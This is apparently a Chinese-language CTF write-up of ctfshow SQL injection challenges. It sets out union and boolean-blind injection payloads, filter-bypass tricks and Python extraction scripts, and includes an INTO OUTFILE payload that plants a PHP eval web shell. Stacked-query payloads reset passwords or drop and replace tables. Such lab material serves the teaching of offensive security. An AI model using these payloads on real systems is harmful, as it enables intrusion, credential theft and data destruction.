+----+----------+--------------+ | id | username | password | +----+----------+--------------+ |4| flag | flag{wh)am!} | +----+----------+--------------+
payload (因为 username 里面含有 flag 字样 , 就不要这个位置回显了 )
0' union select 'USERNAME',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,"1","!"),"2","@"),"3","#"),"4","$"),"5","%"),"6","^"),"7","&"),"8","*"),"9","("),"0",")") from ctfshow_user4 where username = 'flag
payload 很长 , BP 发包(提醒URL 编码)
ctfshow{db)e(^a^-fed^-$^(e-ab!a-*f#@ba&!%e^e}
ctfshow{db0e96a6-fed6-469e-ab1a-8f32ba715e6e}
web 175 木马写入
preg_match('/[\x00-\x7f]/i', json_encode($ret))
极为严格的输出过滤
回显信道很难写了, 试试能不能文件写入
select username,password from ctfshow_user5 where username !='flag' and id = '0' union select 1,from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/choco.php' limit 1;
payload
0' union select 1,from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/choco.php
AntSword 连接 > API Config 文件找到数据库密码 AntSword 连接 > 数据库 找到 flag
过滤注入
web 176 开始过滤
啥也没过 , 新手村
0' or username='flag
web 177 绕过空格
黑盒 经过尝试, 过滤了空格
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
使用 /**/ 和 反引号 绕过
select id,username,password from ctfshow_user where username !='flag'and id ='0'unionselect1,2,3;%23 limit 1;
select id,username,password from ctfshow_user where username !='flag'and id ='0'union/**/select'1',(select`password`from`ctfshow_user`where`username`='flag'),'3';
import requests
import time

# Challenge endpoint; the page's "user_count = N;" snippet is the only feedback
# the loop below reads, so each request yields a single yes/no answer.
url = "http://89bf82b1-24b0-4580-866a-53f84877892f.challenge.ctf.show/select-waf.php"
# Candidate alphabet, tried in this fixed order at every position.
flagstr = "}0123456789-abcdefghijklmnopqrstuvwxyz{"
flag = ""

for i in range(0, 40):
    for x in flagstr:
        # Backticks take the place of spaces in the injected fragment; the regexp
        # is anchored on the fixed "ctfshow" prefix plus what is already known.
        data = {
            "tableName": f'`ctfshow_user`where`pass`regexp("ctfshow{flag + x}")',
        }
        response = requests.post(url, data=data)
        time.sleep(0.25)
        # find() returns -1 when absent; a match at offset 0 would be missed too,
        # which matches the original comparison.
        if response.text.find("user_count = 1;") > 0:
            print(f"{x} is good")
            flag += x
            print(f"ctfshow{flag}")
            break
        print(x)
print(flag)
# Character-to-hex helper: every character becomes the hex digits of its code
# point with the "0x" prefix removed, e.g. "ab" -> "6162".
def str2hex(str):
    """Return the concatenated hex digits of each character in *str*.

    NOTE: the parameter name shadows the builtin ``str``; it is kept so that
    existing callers are unaffected.
    """
    return "".join(hex(ord(ch))[2:] for ch in str)
# Relies on requests/time, url, flagstr and str2hex from the snippets above.
flag = ""
for i in range(0, 40):
    for x in flagstr:
        # 0x63746673686f77 is "ctfshow" as a hex literal; the guessed suffix is
        # appended in the same encoding so the probe carries no quoted string.
        data = {
            "tableName": f"ctfshow_user group by pass having pass regexp(0x63746673686f77{str2hex(flag + x)})",
        }
        response = requests.post(url, data=data)
        time.sleep(0.25)
        if response.text.find("user_count = 1;") > 0:
            print(f"{x} is good")
            flag += x
            print(f"ctfshow{flag}")
            break
        print(x)
print(flag)
def str2hex(str):
    """Concatenate the hex digits of each character's code point in *str*.

    ``hex()`` prefixes every value with "0x"; that prefix is dropped so the
    result can follow a ``0x`` literal directly (e.g. "ab" -> "6162").
    NOTE: the parameter name shadows the builtin ``str``; kept for callers.
    """
    digits = [format(ord(ch), "x") for ch in str]
    return "".join(digits)
def formatstring(str):
    """Render *str* as a comma-led list of terms.

    Digits become parenthesised boolean-arithmetic expressions, every other
    character is double-quoted. Each term is prefixed with ",", so the result
    starts with a comma for non-empty input and is "" for empty input.
    NOTE: the parameter name shadows the builtin ``str``; kept for callers.
    """
    digit_terms = {
        "0": "(false)",
        "1": "(true)",
        "2": "(true+true)",
        "3": "(true+true+true)",
        "4": "(true+true+true+true)",
        # NOTE(review): the next two entries do not follow the pattern of the
        # others (commas instead of "+" for "5", ten terms for "9"); they are
        # reproduced exactly as written in the original.
        "5": "(true,true,true,true,true)",
        "6": "(true+true+true+true+true+true)",
        "7": "(true+true+true+true+true+true+true)",
        "8": "(true+true+true+true+true+true+true+true)",
        "9": "(true+true+true+true+true+true+true+true+true+true)",
    }
    return "".join("," + digit_terms.get(ch, f'"{ch}"') for ch in str)
def formatstring(str):
    """Wrap *str* in a MySQL ``concat(...)`` whose arguments come from char2boolean.

    Each character contributes one piece ending in a trailing comma; the comma
    left by the last piece is removed before the closing parenthesis. For an
    empty *str* the trim removes the opening "(" instead (original behaviour).
    NOTE: the parameter name shadows the builtin ``str``; kept for callers.
    """
    inner = "".join(char2boolean(ch) for ch in str)
    return ("concat(" + inner)[:-1] + ")"
def char2boolean(ch):
    """Encode one character as ``char(true+...+true),`` with ord(ch) terms.

    The trailing comma is left for the caller to join on. When ord(ch) is 0
    there is no "+" to trim, so the slice drops the opening "(" instead; this
    mirrors the original implementation.
    """
    terms = "true+" * ord(ch)
    return ("char(" + terms)[:-1] + "),"
# Relies on requests/time, url, flagstr and formatstring from the snippets above.
flag = "ctfshow{"
for i in range(0, 40):
    for x in flagstr:
        # The whole guess (prefix included) is rewritten by formatstring so the
        # request body contains neither quotes nor digit literals.
        data = {
            "tableName": f"ctfshow_user group by pass having pass regexp({formatstring(flag + x)})",
        }
        # print(data)
        response = requests.post(url, data=data)
        time.sleep(0.5)
        if response.text.find("user_count = 1;") > 0:
            print(f"{x} is good")
            flag += x
            print(flag + "...")
            break
        print(x)
print(flag)
web 186 布尔盲注
新增的过滤< > 不影响185的脚本
再战一次吧
web 187 MD5函数注入
$sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
# Relies on requests/time, url and flagstr from the snippets above.
flag = ""
# Offsets 257..316 are read one character at a time; a response containing
# "8d25" is taken as the positive answer for the current guess.
for i in range(257, 257 + 60):
    for x in flagstr:
        data = {
            "username": f"if(substr(load_file('/var/www/html/api/index.php'),{i},1)=('{x}'),1,0)",
            "password": "0",
        }
        print(data)
        response = requests.post(url, data=data)
        time.sleep(0.2)
        if response.text.find("8d25") > 0:
            print(f"{x} is good")
            flag += x
            print(f"ctfshow{flag}")
            break
        print(x)
print(flag)
QWQ不要直接复制URL 这里调用的API
布尔盲注
web 190 布尔盲注 ASCII
$sql = "select pass from ctfshow_user where username = '{$username}'";
username被单引号包裹
admin' and 2>1# >> POST /api/ {"code":0,"msg":"\u5bc6\u7801\u9519\u8bef","count":0,"data":[]} >> 密码错误
# Relies on requests and time being imported by the first script above.
url = "http://d42e0cf1-5325-4dd7-8c49-fb8ce6a8aee6.challenge.ctf.show/api/"
flag = ""
for i in range(1, 60):
    # Binary search over the printable range; the loop ends when the window
    # collapses to a single code point, which is then appended to the flag.
    hi = 127
    lo = 32
    while 1:
        mid = (hi + lo) >> 1
        if lo == mid:
            flag += chr(mid)
            print(flag)
            break
        # Earlier stages of the same probe, kept for reference:
        #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid) #ctfshow_web
        #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid) #ctfshow_fl0g
        #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid) #id,f1ag
        payload = f"admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{i},1))<{mid})#"
        data = {
            "username": payload,
            "password": 0,
        }
        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        # "8bef" is the tail of the escaped "密码错误" message (see the sample
        # response above); its presence narrows the window downwards.
        if res.text.find("8bef") > 0:
            hi = mid
        else:
            lo = mid
web 191 布尔盲注 ORD
preg_match('/file|into|ascii/i', $username)
ASCII不让用
换成 ord( )函数
web 192 substr =
禁用了 ASCII ORD HEX
没有二分法可用( 转换函数BAN完了基本上 )
采用匹配
admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})# || admin'and ((substr((select f1ag from ctfshow_fl0g),1)='{}'))#
web 193 left >
substr 被过滤
使用LEFT函数判断大小 (a<b<c)
select * from user where username ='admin1'and (left((select column_name from table_name),1)<'d'); +----+----------+----------+ | id | username | password | +----+----------+----------+ |1| admin1 |12| +----+----------+----------+
如果flag取第一个字母 是比d小的 (a b c) 那么查询admin 否则Empty set
admin'and (left((select database()),1)='c')#
好难写 用189(虽然有好多debug代码 但是也方便改了嘻嘻)的改
数据库名
admin'and (left((select tablename() from ctfshow_web),{})='{}')#
查询数据库名: ctfshow_web
数据表名
select * from user where username = 'admin1'and (left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='f'); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | admin1 | 12 | +----+----------+----------+
admin'and (left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{})='{}')#
查询数据表名: ctfshow_flxg
列名
admin'and (left((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{})='{}')#
列名 id,f1ag
注意 列名之间 mysql是用逗号隔开 , flagstr里面记得灵活调整
最后
payload: admin' and (left((select f1ag from ctfshow_flxg),{})='{}')#
# Relies on requests/time, url and flagstr from the snippets above.
flag = ""
for i in range(1, 60):
    for x in flagstr:
        # left() compares the first i characters against the recovered prefix
        # plus one guess, so no substr/ascii/ord calls are needed.
        data = {
            "username": f"admin' and (left((select f1ag from ctfshow_flxg),{i})='{flag + x}')#",
            "password": "0",
        }
        # print(data)
        response = requests.post(url, data=data)
        time.sleep(0.002)
        if response.text.find("8bef") > 0:
            print(f"{x} is good")
            flag += x
            print(flag)
            break
        print(x)
print(flag)
web 194 LPAD
select pass from ctfshow_user where username = '{$username}'
# Relies on requests/time, url and flagstr from the snippets above.
flag = ""
for i in range(1, 60):
    for x in flagstr:
        # Same prefix comparison as the left() version, with lpad in its place.
        data = {
            "username": f"admin' and (lpad((select f1ag from ctfshow_flxg),{i})='{flag + x}')#",
            "password": "0",
        }
        # print(data)
        response = requests.post(url, data=data)
        time.sleep(0.002)
        if response.text.find("8bef") > 0:
            print(f"{x} is good")
            flag += x
            print(flag)
            break
        print(x)
print(flag)
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; }
空格 单双引号 过滤
但是查询语句中没有单双引号保护
可能是堆叠注入
(多条sql语句同时执行)
select | union 被ban
这里提供一个update思路 把密码都重置为1
mysql>select*from hexo where uname ='a';update`hexo`set`position`='Poz'; +----+-------+----------+ | id | uname | position | +----+-------+----------+ |1| a | A | +----+-------+----------+ 1 row in set (0.02 sec)
username=0&password=1 >>{"code":0,"msg":"\u767b\u9646\u6210\u529f flag is ctfshow{73cf58de-eb2b-4c17-83a6-4201abbe626c}","count":0,"data":[]}
插眼 后面有update模块 应该就是通过这个
web 196堆叠
0;select(1) password=1
或
利用泄露过的passwd username=0&passwordAUTO
web 197 重置UP
默认账密username=0&passwordAUTO能出
但是select不让增加了 196的办法不行
这里有个暴力做法, 直接把表给他换成自己的
select position from hexo where uname =0; DROP TABLE IF EXISTS hexo; CREATE TABLE hexo ( `username` VARCHAR(20), `pass` VARCHAR(20) ); INSERT INTO hexo (`username`, `pass`) VALUES (1, 2);